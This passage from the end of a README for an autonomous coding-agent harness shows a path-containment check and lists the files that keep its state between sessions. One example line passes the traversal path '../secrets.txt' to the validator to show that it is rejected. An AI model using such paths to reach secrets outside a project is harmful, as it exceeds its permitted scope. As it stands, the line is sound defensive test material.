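console.log(isInsideProject("/work/app", "src/index.js")); // true
console.log(isInsideProject("/work/app", "../secrets.txt")); // false
```

Comparing whole path segments rather than raw string prefixes avoids treating /work/application as if it were inside /work/app.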

File-Based State

All state is externalized to files for multi-session continuity:

  • feature_list.json - Source of truth for features and progress
  • claude-progress.txt - Human-readable session log
  • vibe-plan-notes.md - Exploration phase output
  • human-feedback.md - Feedback for next session
  • validation-log.json - Audit trail of reviews
  • Git commits - Audit trail and rollback capability

License

MIT


This project was inspired by Anthropic's autonomous-coding quickstart.
